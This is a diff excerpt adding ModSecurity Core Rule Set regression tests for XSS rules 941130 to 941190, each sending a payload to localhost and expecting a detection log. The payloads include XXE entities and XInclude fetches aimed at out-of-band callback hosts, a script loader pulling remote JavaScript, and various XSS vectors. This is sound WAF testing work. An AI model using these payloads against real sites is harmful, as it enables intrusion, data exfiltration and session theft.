test_title: 941130-6
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % grorj SYSTEM \x22http://yikbtpbc1uyy7f89lxt35b6as1yw1qpudm0co1.example'||'foo.bar/\x22>%grorj;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-7
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=<afa xmlns=\x22http://a.b/\x22 xmlns:xsi=\x22http://www.w3.org/2001/XMLSchema-instance\x22 xsi:schemaLocation=\x22http://a.b/ http://2mpfxtfg5y22bjcdp1x79faew52420q0er1hp6.examplefoo.bar/afa.xsd\x22>afa</afa>"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-8
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=<chj xmlns=\x22http://a.b/\x22 xmlns:xsi=\x22http://www.w3.org/2001/XMLSchema-instance\x22 xsi:schemaLocation=\x22http://a.b/ http://1pre0sif8x51eifcs006ceddz45084w4kx7ovd.examplefoo.bar/chj.xsd\x22>chj</chj>"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-9
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=/content.ini'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % dwusu SYSTEM \x22http://ehzrs5as0axe6v7pkdsj4r5qrhxcp6da12osch.example'||'foo.bar/\x22>%dwusu;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-10
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=EmptyValue'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % awpsd SYSTEM \x22http://0cddnr5evws01h2bfzn5zd0cm3sxvrjv7oufi4.example'||'foo.bar/\x22>%awpsd;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-11
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=file:/boot.ini'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % cwtpc SYSTEM \x22http://gvft67ouecbgkxlryf6litjs5jbd5htlhd43ss.example'||'foo.bar/\x22>%cwtpc;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-12
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=Matched Data: <!ENTITY % awfke SYSTEM found within ARGS_NAMES:1'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % awfke SYSTEM \x22http://gj3tu7cu2czg8x9rmful6t7stjzcp4d812osch.example'||'foo.bar/\x22>%awfke;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-13
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=<oez xmlns=\x22http://a.b/\x22 xmlns:xsi=\x22http://www.w3.org/2001/XMLSchema-instance\x22 xsi:schemaLocation=\x22http://a.b/ http://eygr95rshaeenvop1d9jlrmq8hegib6bu4hx5m.examplefoo.bar/oez.xsd\x22>oez</oez>"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-14
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % anwyn SYSTEM \x22http://y98bkp2csupyyfz9cxk3wbxaj1pzuzi26vtohd.example'||'foo.bar/\x22>%anwyn;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-15
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=<vqk xmlns:xi=\x22http://www.w3.org/2001/XInclude\x22><xi:include href=\x22http://749kfyxln3k7toui76fcrksjeak3nybzzsmlaa.examplefoo.bar/foo\x22/></vqk>"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-16
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=2010-01-01'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % fhklu SYSTEM \x22http://fzisa6stibffowpq2eakmsnr9ifhii6mueh45t.example'||'foo.bar/\x22>%fhklu;"
version: HTTP/1.0
output:
log_contains: id "941130"

58
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml Normal file
View File

@@ -0,0 +1,58 @@
---
meta:
author: "zmallen"
enabled: true
name: "941140.yaml"
description: "Tests to trigger, or not trigger 941130"
tests:
-
test_title: 941140-1
desc: XSS vectors making use of javascript uri and tags, e.g., <p style="background:url(javascript:alert(1))">, in ARGS
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/foo'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: '9411400-1=%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E'
output:
log_contains: id "941140"
-
test_title: 941140-2
desc: XSS vectors making use of javascript uri and tags, e.g., <p style="background:url(javascript:alert(1))">, in ARGS_NAMES
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/bar'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2'
output:
log_contains: id "941140"
-
test_title: 941140-3
desc: XSS vectors making use of javascript uri and tags, e.g., <p style="background:url(javascript:alert(1))">, in COOKIE
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/bar'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
Cookie: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2'
output:
log_contains: id "941140"

41
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml Normal file
View File

@@ -0,0 +1,41 @@
---
meta:
author: "zmallen"
enabled: true
name: "941150.yaml"
description: "Tests to trigger, or not trigger 941150"
tests:
-
test_title: 941150-1
desc: Disallowed HTML entities, ARGS
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/foo'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: '941150-1%3D%3Ca%20href%3D%22test%22'
output:
log_contains: id "941150"
-
test_title: 941150-2
desc: Disallowed HTML entities, ARGS
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
uri: '/'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: "payload=<a href=# language=\"JScript.Encode\" onclick=\"#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@\">XSS</a>"
output:
log_contains: id "941150"

218
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml Normal file
View File

@@ -0,0 +1,218 @@
---
meta:
author: "csanders-git, Franziska Bühler"
enabled: true
name: "941160.yaml"
description: "Tests to trigger, or not trigger 941160"
tests:
-
test_title: 941160-1
desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/demo/xss/xml/vuln.xml.php?input=<script+xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)</script>&//'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-2
desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-3
desc: "just another XSS teststring: <x onend="
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%3Cx%20onend%3D'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-4
desc: 'just another XSS teststring: "onzoom='
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%22onzoom%3D'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-5
desc: "just another XSS teststring: 'formaction="
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%27formaction%3D'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-6
desc: "just another XSS teststring:< x: script"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%3C%20x%3A%20script'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-7
desc: "just another XSS teststring:<f o r m"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=$%3Cf%20o%20r%20m'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-8
desc: "just another XSS teststring: '<f o r m' in User-Agent header"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/'
headers:
User-Agent: "ModSecurity CRS 3 Tests %3Cf%20o%20r%20m"
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-9
desc: "just another XSS teststring: '<f o r m' in Referer header"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/'
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
Referer: 'https://coreruleset.org/?%3Cf%20o%20r%20m'
output:
log_contains: id "941160"
-
test_title: 941160-10
desc: "just another XSS teststring: '<f o r m' in Cookie name"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/'
headers:
User-Agent: "ModSecurity CRS 3 Tests %3Cf%20o%20r%20m"
Host: localhost
Cookie: 'PHPSESSID%3Cf%20o%20r%20m=1234'
output:
log_contains: id "941160"
-
test_title: 941160-10
desc: "just another XSS teststring: '<f o r m' in Cookie value"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/'
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
Cookie: 'PHPSESSID=1234%3Cf%20o%20r%20m'
output:
log_contains: id "941160"
-
test_title: 941160-11
desc: "just another XSS teststring: '<f o r m' in ARG NAME"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/?foo%3Cf%20o%20r%20m=bar'
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-12
desc: "just another XSS teststring: '<f o r m' in ARG VALUE"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/?foo=bar%3Cf%20o%20r%20m'
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
output:
log_contains: id "941160"

40
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml Normal file
View File

@@ -0,0 +1,40 @@
---
meta:
author: "csanders-git"
enabled: true
name: "941170.yaml"
description: "Tests to trigger, or not trigger 941170"
tests:
-
test_title: 941170-1
desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941170"
-
test_title: 941170-2
desc: "XSS test based on portswigger XSS cheatsheet"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
uri: '/'
data: "payload=javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'></a>"
output:
log_contains: id "941170"

58
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml Normal file
View File

@@ -0,0 +1,58 @@
---
meta:
author: "zmallen"
enabled: true
name: "941180.yaml"
description: "Tests to trigger, or not trigger 941180"
tests:
-
test_title: 941180-1
desc: Node-validator blacklist keywords, ARGS
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/foo'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: '941180-1=window.location'
output:
log_contains: id "941180"
-
test_title: 941180-2
desc: Node-validator blacklist keywords, ARGS_NAMES
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/bar'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: 'document.cookie=941180-2'
output:
log_contains: id "941180"
-
test_title: 941180-3
desc: Node-validator blacklist keywords, ARGS_NAMES
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/baz'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
Cookie: 'window.location=941180-3'
output:
log_contains: id "941180"

58
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml Normal file
View File

@@ -0,0 +1,58 @@
---
meta:
author: "csanders-git"
enabled: true
name: "941190.yaml"
description: "Tests to trigger, or not trigger 941190"
tests:
-
test_title: 941190-1
desc: Node-validator blacklist keywords, ARGS
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/foo'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: "941190-1=<STYLE>@import'http://xss.rocks/xss.css';</STYLE>"
output:
log_contains: id "941190"
-
test_title: 941190-2
desc: Node-validator blacklist keywords, ARGS_NAMES
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/bar'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: "x=<STYLE>@im\\port'\\ja\vasc\\ript:alert('XSS')';</STYLE>"
output:
log_contains: id "941190"
-
test_title: 941190-3
desc: Node-validator blacklist keywords, COOKIES_NAMES
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/baz'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
Cookie: '<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>'
output:
log_contains: id "941190"

Some files were not shown because too many files have changed in this diff Show More